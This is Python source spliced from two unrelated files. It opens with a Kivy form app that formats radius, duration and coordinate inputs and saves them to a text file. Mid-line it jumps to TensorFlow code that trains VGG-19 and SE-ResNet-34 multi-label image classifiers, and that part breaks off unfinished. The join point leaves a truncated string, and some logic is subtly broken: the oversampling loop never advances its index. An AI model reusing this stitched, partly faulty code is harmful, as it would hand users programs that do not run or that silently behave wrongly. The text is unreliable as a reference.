len(sinradius)\n radius = float(numin(sinradius))\n if 'mi' in sinradius:\n radiusmi = radius\n radius *= mi2km\n else:\n radiusmi = radius / mi2km\n sinradius += f' : [{radius:0.3f} km] = {radiusmi:0.3f} miles'\n self.ids[sid].text = sinradius\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=\"Check that radius is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n\n def format_duration(self, sduration): # checks if duration entered and in right format\n try:\n sid = 'duration_input'\n sduration = sduration.split(':', 1)[0].strip()\n ltsin = len(sduration)\n sdurations = sduration + 's'\n D = float(re.search('[\\d. ]+d', sdurations)[0][:-1]) if re.search('[\\d. ]+d', sdurations) else 0\n H = float(re.search('[\\d. ]+h', sdurations)[0][:-1]) if re.search('[\\d. ]+h', sdurations) else 0\n M = float(re.search('[\\d. ]+m', sdurations)[0][:-1]) if re.search('[\\d. ]+m', sdurations) else 0\n S = float(re.search('[\\d. ]+s', sdurations)[0][:-1]) if re.search('[\\d. ]+s', sdurations) else 0\n tduration = D * 86400 + H * 3600 + M * 60 + S\n sduration += f' : [{tduration:0.0f} seconds] = {fduration(tduration)}'\n self.ids[sid].text = sduration\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (AttributeError, ValueError):\n content = Label(\n text=\"Please ensure that 'duration' is entered and in the proper format.\" + \"\\n\" + \"(hrhr:minmin:secsec)\" + \"\\n\" + \"Touch outside to dismiss.\",\n halign='center', valign='middle')\n popup = Popup(title=\"Duration Error\", content=content, size_hint=(.6, .6)).open()\n\n def save(self):\n agent = self.ids['agent_input'].text\n event = self.ids['event_input'].text\n activity = self.ids['activity_input'].text\n radius = self.ids['radius_input'].text\n duration = self.ids['duration_input'].text\n ip = self.ids['ip_input'].text\n comments = self.ids['comments_input'].text\n rcsinputs = open(\"rcsinputs.txt\", 'w')\n\n rcsinputs.write(\"Agent: \" + agent + \"\\n\" + \"Event: \" + event + \"\\n\" + \"Activity: \" + activity + \"\\n\" + \"Radius: \" + radius + \"\\n\" + \"Duration: \" + duration + \"\\n\" + \"IP: \" + ip + \"\\n\" + \"Comments: \" + comments + \"\\n\")\n rcsinputs.close()\n\n\n\n\n\n\n\n\nclass RV(RecycleView):\n def __init__(self, **kwargs):\n super(RV, self).__init__(**kwargs)\n self.data = [{'spalte1_SP': str(x['col1']), 'spalte2_SP': str(x['col2']), 'spalte3_SP': str(x['col3']),\n 'spalte4_SP': str(x['col4']),'spalte5_SP': str(x['col5']), 'spalte6_SP': str(x['col6']),\n 'spalte7_SP': str(x['col7']), 'spalte8_SP': str(x['col8']), 'spalte9_SP': str(x['col9'])\n , 'spalte10_SP': str(x['col10'])} for x in tdata]\n\nclass VV(RecycleView):\n def __init__(self, **kwargs):\n super(VV, self).__init__(**kwargs)\n self.data = [{'data1': str(x['col1']), 'data2': str(x['col2']), 'data3': str(x['col3']),\n 'data4': str(x['col4']), 'data5': str(x['col5']), 'data6': str(x['col6']),\n 'data7': str(x['col7']), 'data8': str(x['col8']), 'data9': str(x['col9'])\n , 'data10': str(x['col10'])} for x in xdata]\n\n\n\n\nclass SecondScreen(Screen):\n def validate_input(self, sinput):\n try:\n sinput, sid = sinput.split('|||')\n sinput = sinput.strip()\n ltsin = len(sinput)\n self.ids[sid].text = sinput\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content 
= Label(text=\"Check the input is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n def format_elevation(self, selevation): # format elevation to meter from meter (m) or feet (ft)\n try:\n sid = 'elevation_input'\n selevation = selevation.split(':', 1)[0].strip()\n ltsin = len(selevation)\n elevation = float(numin(selevation))\n if 'ft' in selevation or 'feet' in selevation or 'foot' in selevation:\n elevationft = elevation\n elevation *= feet2meter\n elif 'km' in selevation:\n elevation *= km2meter\n elevationft = elevation / feet2meter\n elif 'meter' in selevation or ('m' in selevation and not re.search('[a-ln-z]+', selevation)):\n elevationft = elevation / feet2meter\n elif re.search('[a-z]+', selevation):\n emessage = \"Invalid '\" + re.search('[a-zA-Z]+', selevation)[0] + \"' unit.\"\n raise TypeError()\n else:\n elevationft = elevation / feet2meter\n selevation += f' : [{elevation:0.3f} m] = {elevationft:0.3f} ft'\n self.ids[sid].text = selevation\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=emessage + \"\\n\" + \"Touch outside to dismiss.\", halign='center', valign='middle')\n popup = Popup(title=\"Elevation Error\", content=content, size_hint=(.6, .6)).open()\n\n def _refocus_textinput(self, *args):\n self.ids[args[0]].cursor = (args[1], 0)\n self.ids[args[0]].get_focus_next().focus = True\n\n def format_latlong(self, slatlong): # adds degrees/minutes/seconds to longitude\n lcd = [];\n di = '';\n dn = 1\n try:\n if 'LATITUDE' in slatlong:\n sid = 'latitude_input'\n lcd = ['N', 'S']\n slatlong = slatlong.split(':', 1)[0].strip()\n if 'n' in slatlong.lower():\n di = 'N';\n dn = 1\n elif 's' in slatlong.lower():\n di = 'S';\n dn = -1\n elif 'LONGITUDE' in slatlong:\n sid = 'longitude_input'\n lcd = ['E', 'W']\n slatlong = slatlong.split(':', 1)[0].strip()\n if 'e' in slatlong.lower():\n di = 'E';\n dn = 1\n elif 'w' in slatlong.lower():\n di = 'W';\n dn = -1\n # lstr = [s for sd in slatlong.split(' ') for sm in sd.split(\"'\") for s in sm.split('\"') if s]\n ltsin = len(slatlong)\n lstr = [slatlong]\n for sc in SplittingCharacters:\n lsc = []\n for str in lstr:\n lsc += list(filter(('').__ne__, str.split(sc)))\n lstr = lsc\n dmsd = [0, 0, 0, dn];\n i = 0\n for str in lstr:\n try:\n dmsd[i] = float(str)\n i += 1\n except:\n continue\n if i > 2:\n break\n if dmsd[0] < 0:\n dmsd[3] = -1\n dd = dmsd2dd(dmsd)\n sdmsd = dd2dmsd(dd, lcd)\n slatlong += f' : [{dd:0.7f}] = {sdmsd[0]} {sdmsd[1]}\\' {sdmsd[2]}\" {sdmsd[3]}'\n self.ids[sid].text = slatlong\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(\n text=\"Check that latitude/longitude has been validated.\" + \"\\n\" + \"Touch outside to dismiss.\",\n halign='center', valign='middle')\n popup = Popup(title=\"Latitude/Longitude Error\", content=content, size_hint=(.6, .6)).open()\n\n def save(self):\n address = self.ids['address_input'].text\n citystatezip = self.ids['citystatezip_input'].text\n country = self.ids['country_input'].text\n latitude = self.ids['latitude_input'].text\n longitude = self.ids['longitude_input'].text\n elevation = self.ids['elevation_input'].text\n rcsinputs = open(\"rcsinputs.txt\", 'a')\n\n rcsinputs.write(\n \"Address: \" + address + \"\\n\" + \"City/State/Zip: \" + citystatezip + \"\\n\" + \"Country: \" + 
country + \"\\n\" \"Latitude: \" + latitude + \"\\n\" + \"Longitude: \" + longitude + ': ' + \"\\n\" + \"Elevation: \" + elevation + \"\\n\")\n rcsinputs.close()\n\n\n\n\nclass TestingApp(App):\n\n def build(self):\n root = ScreenManager()\n root.add_widget(FirstScreen(name='FirstScreen'))\n root.add_widget(SecondScreen(name = 'SecondScreen'))\n root.add_widget(RVScreen(name='RVScreen'))\n return root\n\n\n\n\n def save(self, event, activity, agent, address, citystatezip, country, latitude, longitude, elevation, radius, duration, ip, comments, spectrum): # formats and prompts user to save rcsinputs.txt file\n inheader = ['# tol\n if img.ndim==3:\n mask = mask.all(2)\n m,n = mask.shape\n mask0,mask1 = mask.any(0),mask.any(1)\n col_start,col_end = mask0.argmax(),n-mask0[::-1].argmax()\n row_start,row_end = mask1.argmax(),m-mask1[::-1].argmax()\n img = img[row_start:row_end,col_start:col_end]\n img = tf.convert_to_tensor(img)\n return img\n\ndef create_record(path, X, y):\n \"\"\"\n \n \"\"\"\n options = tf.io.TFRecordOptions(compression_type='GZIP')\n y = tf.convert_to_tensor(y)\n with tf.io.TFRecordWriter(path, options=options) as writer:\n for i in range(len(X)):\n try:\n image = tf.io.decode_image(tf.io.read_file(X[i]))\n except tf.errors.InvalidArgumentError as e:\n print(X[i])\n continue\n image = tf.io.decode_image(tf.io.read_file(X[i]))\n image = crop_image(image)\n image = tf.image.resize(image, (244, 244), method='nearest', preserve_aspect_ratio=True)\n image = tf.io.encode_jpeg(image)\n label = y[i]\n tf_example = create_example(image, label)\n writer.write(tf_example.SerializeToString())\n\n# On prem\n#dset_train = os.path.join(os.curdir, '../records244/train')\n#dset_val = os.path.join(os.curdir, '../records244/dset_val.tfrecord')\n#dset_test = os.path.join(os.curdir, '../records244/dset_test.tfrecord')\n\n# Colab\ndset_train = os.path.join(os.curdir, './records244/dset_train.tfrecord')\ndset_val = os.path.join(os.curdir, './records244/dset_val.tfrecord')\ndset_test = os.path.join(os.curdir, './records244/dset_test.tfrecord')\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\ntf.random.set_seed(42)\nrandom.seed(42)\ntrain_dataset = tf.data.TFRecordDataset(dset_train, compression_type='GZIP').shuffle(2048)\nval_dataset = tf.data.TFRecordDataset(dset_val, compression_type='GZIP')\ntest_dataset = tf.data.TFRecordDataset(dset_test, compression_type='GZIP')\n\ndef _parse_dataset(example_proto, img_size=[244, 244]):\n image_feature_description = {\n 'labels': tf.io.FixedLenFeature([], tf.string),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n }\n parsed = tf.io.parse_single_example(example_proto, image_feature_description)\n labels = tf.io.parse_tensor(parsed['labels'], tf.int64)\n labels.set_shape((8,))\n image = tf.io.decode_image(parsed['image_raw']) / 255\n image.set_shape(img_size + [3])\n return image, labels\n\nimage_feature_description = {\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n 'labels': tf.io.FixedLenFeature([], tf.string)\n}\ntrain_dataset = train_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\nval_dataset = val_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\ntest_dataset = test_dataset.map(_parse_dataset, num_parallel_calls=AUTOTUNE).batch(32).prefetch(AUTOTUNE)\n\n# Split a single TF Record into multiple files\ndef _parse_raw_dataset(example_proto, img_size=[360, 360]):\n parsed = tf.io.parse_single_example(example_proto, image_feature_description)\n labels = 
tf.io.parse_tensor(parsed['labels'], tf.int64)\n labels.set_shape((8,))\n image = parsed['image_raw']\n return image, labels\n\ndef shard_tfrecord(path, name, record):\n options = tf.io.TFRecordOptions(compression_type='GZIP')\n dset = tf.data.TFRecordDataset(record, compression_type='GZIP')\n dset = dset.map(_parse_raw_dataset).batch(1000)\n batch_id = 0\n for batch in dset:\n batch_ds = tf.data.Dataset.from_tensor_slices(batch)\n filename = f'{name}.{batch_id:03d}'\n record_path = os.path.join(path, filename)\n with tf.io.TFRecordWriter(record_path, options=options) as writer:\n for ex in batch_ds:\n tf_example = create_example(*ex)\n writer.write(tf_example.SerializeToString())\n batch_id += 1\n \ndef augment_image(image):\n image = tf.image.random_flip_left_right(image, seed=42)\n image = tf.image.random_flip_up_down(image, seed=42)\n image = tf.image.random_contrast(image, 0.8, 1.0, seed=42)\n image = tf.image.random_brightness(image, 0.1, seed=42)\n image = tf.minimum(image, 255)\n return image\n\ndef oversample_dataset(record, target):\n labels = []\n images = []\n \n augmented_images = []\n augmented_labels = []\n \n for batch in record:\n image = batch[0]\n label = batch[1]\n images.append(image)\n labels.append(label)\n \n images = tf.concat(images, 0)\n labels = tf.concat(labels, 0)\n \n for i in range(8):\n current = labels[:, i] == 1\n current_img = images[current]\n current_labels = labels[current]\n current_number = current_img.shape[0]\n \n # Number of images we need to create\n num_create = target - current_number\n \n if num_create < 0:\n augmented_images.extend(current_img)\n augmented_labels.extend(current_labels)\n continue\n \n ind = 0 \n for j in tqdm.trange(num_create):\n over_img = tf.io.decode_image(current_img[ind])\n over_lab = current_labels[ind]\n over_img = tf.io.encode_jpeg(augment_image(over_img))\n \n augmented_images.append(over_img)\n augmented_labels.append(over_lab)\n ind = min(ind, current_img.shape[0]-1)\n \n augmented_images.extend(current_img)\n augmented_labels.extend(current_labels)\n \n augmented_images = tf.stack(augmented_images)\n augmented_labels = tf.stack(augmented_labels)\n \n tf.random.set_seed(42)\n indices = tf.random.shuffle(tf.range(augmented_images.shape[0]), seed=42)\n augmented_images = tf.gather(augmented_images, indices)\n augmented_labels = tf.gather(augmented_labels, indices)\n \n return augmented_images, augmented_labels\n \ndef undersample(majority_images, majority_labels, target):\n tf.random.set_seed(42)\n indices = tf.random.shuffle(tf.range(majority_images.shape[0]), seed=42)[:target]\n under_sampled_img = tf.gather(majority_images, indices)\n under_sampled_labels = tf.gather(majority_labels, indices)\n return under_sampled_img, under_sampled_labels\n\n# Callbacks\nclass ExpoIncreaseLRCallback(keras.callbacks.Callback):\n \"\"\"\n Exponentially increases the learning rate by a constant factor. Meant to\n be run over a few hundred iterations in one epoch. Stores a history object\n of the loss and the learning rates. 
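In this file it is used by compiling with a small base LR, fitting for a single epoch with this callback, and then plotting self.lr against self.loss to see where training diverges. 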
The optimal loss is usually about 10x\n lower than when the algorithm diverges (loss shoots up).\n \"\"\"\n def __init__(self, factor): \n super().__init__()\n self.loss = []\n self.lr = []\n self.factor = factor\n \n def on_batch_end(self, batch, logs=None):\n loss = logs['loss']\n prev_lr = K.get_value(self.model.optimizer.lr)\n self.lr.append(prev_lr)\n self.loss.append(loss)\n K.set_value(self.model.optimizer.lr, prev_lr * self.factor)\n\nclass OneCycleScheduler(keras.callbacks.Callback):\n \"\"\"\n Learning rate scheduler, implementing a cyclical learning rate (Smith, 2018).\n https://arxiv.org/abs/1803.09820 \n \"\"\"\n def __init__(self, epoch_size, batch_size, max_lr, max_momentum=0, min_momentum=0):\n super(OneCycleScheduler, self).__init__()\n self.max_lr = max_lr\n self.min_lr = max_lr / 10\n self.progress = 0\n self.iterations = epoch_size // batch_size\n self.max_momentum = max_momentum\n self.min_momentum = min_momentum\n \n def on_epoch_begin(self, epoch, logs=None):\n keras.backend.set_value(self.model.optimizer.lr, self.min_lr)\n keras.backend.set_value(self.model.optimizer.momentum, self.max_momentum)\n self.progress = 0\n \n def on_train_batch_begin(self, batch, logs=None):\n self.progress += 1\n \n # Finding rate of change to halfway through epoch\n half = self.iterations // 2 \n lr_roc = (self.max_lr - self.min_lr) / half\n \n # Increase if first half, else decrease\n if self.progress >= half:\n lr_roc *= -1\n lr = self.model.optimizer.lr\n cur_lr = lr + lr_roc\n keras.backend.set_value(self.model.optimizer.lr, cur_lr)\n \n # Finding rate of change for momentum\n momentum_roc = -((self.max_momentum - self.min_momentum) / half)\n \n # Decrease if first half, else decrease\n if self.progress >= half:\n momentum_roc *= -1\n momentum = self.model.optimizer.momentum\n cur_momentum = momentum + momentum_roc\n keras.backend.set_value(self.model.optimizer.momentum, cur_momentum)\n\ndef make_vgg_net():\n \"\"\"\n Implementation of the 2015 ILSVRC second place VGGNet-19 architecture.\n Note that the placement of the batch normalization layers in front of\n the activation was purposeful. 
There is some debate regarding whether\n or not the placement of BN before or after ReLU has any large effect\n on performance.\n\n From Simonyan et al., (2017) https://arxiv.org/pdf/1409.1556.pdf\n \"\"\"\n augmentation = keras.models.Sequential([\n keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n keras.layers.experimental.preprocessing.RandomFlip('vertical'),\n ])\n normalization = keras.layers.experimental.preprocessing.Normalization()\n for batch in train_dataset.take(3):\n img = batch[0]\n normalization.adapt(img)\n\n model = keras.models.Sequential([\n augmentation,\n normalization,\n keras.layers.Conv2D(64, 3, padding=\"same\", input_shape=[244, 244, 3]),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(64, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(2),\n keras.layers.Conv2D(128, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(128, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(256, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Conv2D(512, 3, padding=\"same\"),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.MaxPooling2D(pool_size=(2,2), strides=2),\n keras.layers.Flatten(),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(4096, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(4096, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dropout(rate=0.5),\n keras.layers.Dense(1000, kernel_initializer='he_normal'),\n keras.layers.Activation('relu'),\n keras.layers.BatchNormalization(),\n keras.layers.Dense(8, activation=\"sigmoid\")\n ])\n return model\n\ndef train_nadam_vgg_19():\n K.clear_session()\n 
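# Clearing the Keras session and re-seeding below keeps repeated training runs\n    # reproducible, since each call then starts from freshly initialised weights.\n    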
tf.random.set_seed(42)\n random.seed(42)\n model = make_vgg_net()\n model.compile(optimizer=keras.optimizers.Nadam(lr=3e-4),\n metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/custom_vggnet19.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb =tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/custom_vggnet19.csv',\n separator=\",\", append=False)\n\n history = model.fit(\n train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[tensorboard_cb, model_checkpoint_cb,\n early_stopping_cb, csv_logger_cb])\n\n return model\n\n# Code for model predictions\ndef create_confusion_matrix(y_true, y_pred, names):\n confusion = multilabel_confusion_matrix(y_true, y_pred)\n fig, axes = plt.subplots(2, 4, figsize=(15, 8))\n fig.tight_layout()\n axes = axes.ravel()\n\n for ind, ax in enumerate(axes):\n confusion_display = ConfusionMatrixDisplay(confusion[ind], display_labels=[0, 1])\n confusion_display.plot(ax=ax, values_format='.5g')\n ax.set_title(names[ind])\n\ndef _to_labels(pos_probs, threshold):\n return (pos_probs >= threshold).astype('int')\n\ndef get_thresholds(model, dataset, samples=1):\n y_prob = np.stack([model.predict(dataset) for sample in range(samples)]).mean(axis=0)\n y_true = []\n for ind, batch in enumerate(dataset):\n y_true.append(batch[1])\n \n y_true = tf.concat(y_true, 0)\n thresholds = np.arange(0, 1, 0.001)\n class_thresholds = []\n\n for i in range(8):\n scores = [f1_score(y_true[:, i], _to_labels(y_prob[:, i], t)) for t in thresholds] \n ix = np.argmax(scores)\n class_thresholds.append(thresholds[ix])\n\n return class_thresholds\n\ndef get_predictions(model, class_thresholds, dataset, samples=1):\n y_prob = np.stack([model.predict(dataset) for sample in range(samples)]).mean(axis=0)\n y_true = []\n for ind, batch in enumerate(dataset):\n y_true.append(batch[1])\n \n y_true = tf.concat(y_true, 0)\n y_pred = []\n for ind, thresh in enumerate(class_thresholds):\n class_pred = np.where(y_prob[:, ind] > thresh, 1, 0)\n y_pred.append(tf.reshape(class_pred, (-1, 1)))\n y_pred = tf.concat(y_pred, 1)\n return y_true, y_pred\n\n\n\n\n# Custom VGGNet error analysis\nmodel = keras.models.load_model('/content/drive/MyDrive/models/custom_vggnet19.h5')\nthresholds = get_thresholds(model, val_dataset) \ny_true, y_pred = get_predictions(model, thresholds, test_dataset)\nprint(classification_report(y_true, y_pred))\nprint(roc_auc_score(y_true, y_pred))\ncreate_confusion_matrix(y_true, y_pred, dset.columns[2:])\n\n\n\n\n# VGGNet, same architecture, instead using SGD\nK.clear_session()\ntf.random.set_seed(42)\nrandom.seed(42)\n\n# Finding the optimial learning rate\nexpo_lr = ExpoIncreaseLRCallback(1.032)\nmodel = make_vgg_net()\nmodel.compile(optimizer=keras.optimizers.SGD(lr=0.0001), metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\nmodel.fit(train_dataset, epochs=1, callbacks=[expo_lr])\n\n\n\n\nplt.plot(expo_lr.lr, expo_lr.loss)\nplt.xscale('log')\n\n\n# 0.11 seems to be a good learning rate. 
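(That value is read off the LR-vs-loss plot above; the usual heuristic is to pick a maximum rate just below the point where the loss curve starts to shoot up.) 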
We can use this as the maximum learning rate for our cyclical learning rate scheduler.\n\n\n\nmodel = make_vgg_net()\n\n# Callbacks\none_cycle_scheduler = OneCycleScheduler(11020, 32, 0.11)\nlogdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\ntensorboard_cb = keras.callbacks.TensorBoard(logdir)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint('/content/drive/MyDrive/models/SGD_vggnet19.h5', monitor='val_loss', save_best_only=True, save_freq='epoch')\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\ncsv_logger_cb =tf.keras.callbacks.CSVLogger('/content/drive/MyDrive/learning_curves/SGD_vggnet19.csv', separator=\",\", append=False)\n\noptimizer = keras.optimizers.SGD(lr=0.11)\nmodel.compile(optimizer=optimizer, metrics=['binary_accuracy', 'AUC'], loss='binary_crossentropy')\nhistory = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[one_cycle_scheduler, tensorboard_cb, model_checkpoint_cb, early_stopping_cb, csv_logger_cb])\n\n\n\n\nclass SEResidualUnit(keras.layers.Layer):\n \"\"\"\n The residual units with skip connections and SE-blocks. Based on\n Hu et al, (2017)\n\n https://arxiv.org/abs/1709.01507\n \"\"\"\n def __init__(self, filters, ratio=8, strides=1, activation='relu', **kwargs):\n super().__init__(**kwargs)\n self.activation = keras.activations.get(activation)\n self.filters = filters\n self.strides = strides\n\n # The main layers of the residual unit, two convolutional layers,\n # one with a stride of one and batch normalization layers\n self.main_layers = [\n keras.layers.Conv2D(filters, 3, strides=strides,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization(),\n self.activation,\n keras.layers.Conv2D(filters, 3, strides=1,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization(),\n ]\n\n # Defining the skip connection and the convolutional layer the inputs\n # have to pass through so as to ensure the shapes of added inputs are\n # the same as those going through the main layer\n self.skip_layers = []\n if strides > 1:\n self.skip_layers = [\n keras.layers.Conv2D(filters, 1, strides=strides,\n padding='same', use_bias=False),\n keras.layers.BatchNormalization()\n ]\n\n # SE Block\n self.ratio = ratio\n self.se_block = [\n keras.layers.GlobalAveragePooling2D(),\n keras.layers.Flatten(),\n keras.layers.Dense(filters//ratio, activation='relu', kernel_initializer='he_normal', use_bias=False),\n keras.layers.Dense(filters, activation='sigmoid', kernel_initializer='he_normal', use_bias=False),\n ]\n\n def call(self, inputs):\n \"\"\"\n Adding the inputs from the skip connection to the outputs and passing\n output of Residual Unit to SE block.\n \"\"\"\n # Residual unit\n Z = inputs\n for layer in self.main_layers:\n Z = layer(Z)\n\n # SE Block\n X = Z\n for layer in self.se_block:\n X = layer(X)\n Z = keras.layers.multiply([X, Z]) \n\n # Skip connection\n skip_Z = inputs\n for layer in self.skip_layers:\n skip_Z = layer(skip_Z)\n\n out = self.activation(Z + skip_Z)\n return out\n\n def get_config(self):\n activation = self.activation\n filters = self.filters\n strides = self.strides\n ratio = self.ratio\n base_config = super().get_config()\n return {**base_config, 'filters': filters, 'strides': strides,\n 'activation': keras.activations.serialize(activation), 'ratio': ratio}\n\n\ndef create_resnet():\n \"\"\"\n SE-ResNet-34 architecture\n\n \"\"\"\n augmentation = keras.models.Sequential([\n keras.layers.experimental.preprocessing.RandomFlip('horizontal'),\n 
keras.layers.experimental.preprocessing.RandomFlip('vertical'),\n ])\n model = keras.models.Sequential()\n model.add(augmentation)\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.Conv2D(64, 7, strides=2, input_shape=(244, 244, 3),\n padding='same', use_bias=False))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.MaxPooling2D(2))\n prev_filters = 64\n for filters in [64] * 3 + [128] * 4 + [256] * 6 + [512] * 3:\n strides = 1 if prev_filters == filters else 2\n model.add(SEResidualUnit(filters, strides=strides, activation='relu'))\n model.add(keras.layers.GlobalAveragePooling2D())\n model.add(keras.layers.Flatten())\n model.add(keras.layers.Dense(1000, kernel_initializer='he_normal'))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation('relu'))\n model.add(keras.layers.Dense(8, activation='sigmoid'))\n return model\n\ndef find_sdg_se_resnet_lr():\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n expo_lr = ExpoIncreaseLRCallback(1.05)\n model = create_resnet()\n model.compile(optimizer=keras.optimizers.SGD(lr=0.4), loss='binary_crossentropy', metrics=['binary_accuracy', precision, recall, 'AUC'])\n history = model.fit(train_dataset, epochs=10, validation_data=val_dataset, callbacks=[one_cycle])\n return history\n\n\n\ndef train_sgd_se_resnet():\n # Training SE-Resnet-34 model\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n model = create_resnet()\n\n one_cycle = OneCycleScheduler(11020, 32, 0.4)\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/SE_resnet34.h5', monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\n csv_logger_cb = tf.keras.callbacks.CSVLogger('/content/drive/MyDrive/learning_curves/SE_resnet34_no_class_weights.csv', separator=\",\", append=False)\n\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n\n model.compile(optimizer=keras.optimizers.SGD(lr=0.4),\n loss='binary_crossentropy',\n metrics=['binary_accuracy', precision, recall, 'AUC'])\n\n history = model.fit(train_dataset, epochs=1000, validation_data=val_dataset,\n callbacks=[one_cycle, model_checkpoint_cb, \n early_stopping_cb, csv_logger_cb, tensorboard_cb])\n return model\n\ndef train_nadam_se_resnet():\n # Training SE-Resnet-34 model with Nadam\n K.clear_session()\n tf.random.set_seed(42)\n random.seed(42)\n model = create_resnet()\n\n # Callbacks\n logdir = os.path.join(\"logs\", datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n tensorboard_cb = keras.callbacks.TensorBoard(logdir)\n model_checkpoint_cb = keras.callbacks.ModelCheckpoint(\n '/content/drive/MyDrive/models/Nadam_SE_resnet34.h5',\n monitor='val_loss', save_best_only=True, save_freq='epoch')\n early_stopping_cb = keras.callbacks.EarlyStopping(patience=30)\n csv_logger_cb = tf.keras.callbacks.CSVLogger(\n '/content/drive/MyDrive/learning_curves/SE_resnet34_Nadam.csv',\n separator=\",\", append=True)\n\n # Metrics\n precision = keras.metrics.Precision()\n recall = keras.metrics.Recall()\n\n # Compile model\n 
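# Sigmoid outputs with binary cross-entropy treat the 8 labels as independent,\n    # which is what this multi-label (rather than single-class) problem needs.\n    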
